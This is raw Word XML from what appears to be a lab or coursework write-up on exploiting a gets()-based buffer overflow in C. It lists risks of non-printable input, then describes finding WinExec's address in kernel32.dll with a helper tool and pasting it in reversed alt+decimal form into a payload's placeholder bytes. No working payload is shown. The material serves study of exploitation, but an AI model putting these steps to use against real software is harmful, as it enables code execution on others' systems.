          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A8CB133" w14:textId="77777777" w:rsidR="008175DE" w:rsidRDefault="00F649F8" w:rsidP="008175DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F649F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When reading user input using functions like </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F649F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gets(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F649F8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) in C programming language, non-printable characters can cause several issues. For example, if the user enters a non-printable character like a carriage return (\r) or line feed (\n) as part of the input string, it may interfere with how the program processes the input.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Overall</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> these are the issues with those non-printable characters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132F5EC6" w14:textId="47852942" w:rsidR="008175DE" w:rsidRPr="008175DE" w:rsidRDefault="00F649F8" w:rsidP="008175DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="008175DE" w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Input validation issues: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008175DE" w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Non-printable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008175DE" w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> characters can interfere with input validation, making it difficult to ensure that user input is in the expected format or meets certain criteria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5395E4" w14:textId="77777777" w:rsidR="008175DE" w:rsidRPr="008175DE" w:rsidRDefault="008175DE" w:rsidP="008175DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70AA1C00" w14:textId="77777777" w:rsidR="008175DE" w:rsidRPr="008175DE" w:rsidRDefault="008175DE" w:rsidP="008175DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Buffer overflow vulnerabilities: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Non-printable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> characters can cause buffer overflows if the input buffer is not properly bounded or if the program does not account for them in its processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4901137A" w14:textId="77777777" w:rsidR="008175DE" w:rsidRPr="008175DE" w:rsidRDefault="008175DE" w:rsidP="008175DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49550351" w14:textId="77777777" w:rsidR="008175DE" w:rsidRPr="008175DE" w:rsidRDefault="008175DE" w:rsidP="008175DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Command injection vulnerabilities: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Non-printable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> characters can be used in command injection attacks, where an attacker injects malicious commands into user input and then tricks the program into executing them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6D05A7" w14:textId="77777777" w:rsidR="008175DE" w:rsidRPr="008175DE" w:rsidRDefault="008175DE" w:rsidP="008175DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A7EBF98" w14:textId="77777777" w:rsidR="008175DE" w:rsidRPr="008175DE" w:rsidRDefault="008175DE" w:rsidP="008175DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">String termination issues: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Non-printable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> characters can interfere with string termination, causing unexpected behavior or crashes in the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B890196" w14:textId="77777777" w:rsidR="008175DE" w:rsidRPr="008175DE" w:rsidRDefault="008175DE" w:rsidP="008175DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45F597C3" w14:textId="420EA964" w:rsidR="00F649F8" w:rsidRPr="00AF510C" w:rsidRDefault="008175DE" w:rsidP="008175DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Encoding issues: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Non-printable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008175DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> characters can cause encoding issues when reading or writing text files, particularly if the encoding is not compatible with the characters being used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF33C4C" w14:textId="77777777" w:rsidR="00BE1A6B" w:rsidRPr="00BE1A6B" w:rsidRDefault="00BE1A6B" w:rsidP="00BE1A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B672DC" w14:textId="77777777" w:rsidR="00BE1A6B" w:rsidRPr="00BE1A6B" w:rsidRDefault="00BE1A6B" w:rsidP="00BE1A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693F1D69" w14:textId="77777777" w:rsidR="00BE1A6B" w:rsidRDefault="00BE1A6B" w:rsidP="00BE1A6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E9EF62" w14:textId="3518F623" w:rsidR="00FD1D85" w:rsidRPr="00436173" w:rsidRDefault="001D1074">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">About those XXXX, this is the address of </w:t>
      </w:r>
      <w:r w:rsidR="00771DFA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00436173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00436173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function from kernel32.dll library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77914AC1" w14:textId="75A45D37" w:rsidR="00FD1D85" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>===TASK_TWO_END===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D99101A" w14:textId="340B7882" w:rsidR="00183C06" w:rsidRDefault="00183C06">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371ADC82" w14:textId="771C03C7" w:rsidR="00183C06" w:rsidRPr="009B343B" w:rsidRDefault="00F865B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TASKS 3 AND 4 </w:t>
      </w:r>
      <w:r w:rsidR="00183C06" w:rsidRPr="00183C06">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HAS BEEN UNCHACHED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEDCB3F" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="00FD1D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9AF08E" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>===TASK_THREE_START===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591886A6" w14:textId="642AC298" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We have a problem regarding the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">After each reboot the address of the function in Kernel32.dll changes, therefore we need to know the address first. </w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">I have made another simple app that gives you the address of the function, called: </w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>getWinExec.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">When launched - it will ask you to enter either "reload" or "exit". "Reload" will give you the address, "exit" will close the app. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF2781B" w14:textId="09DD8A66" w:rsidR="00FD1D85" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">After getting the address, we pass it through hexDex.exe and get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alt+decimal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> value in reversed order and paste it into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> chunk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF66992" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="00FD1D85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="343CBDA3" w14:textId="44C6FD03" w:rsidR="00FD1D85" w:rsidRPr="009B343B" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The reason </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> was selected </w:t>
      </w:r>
      <w:r w:rsidR="00815B7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00815B7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is its </w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">simplicity in comparison with other </w:t>
      </w:r>
      <w:r w:rsidR="00815B7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>process-creating</w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> functions, since they require </w:t>
      </w:r>
      <w:r w:rsidR="00815B7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>complex assembly instructions</w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to assemble and call a function. In addition, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00815B7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">called by </w:t>
      </w:r>
      <w:r w:rsidR="00815B7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>single line of code or 2 lines of instructions. (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B343B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> guess).</w:t>
      </w:r>
    </w:p>
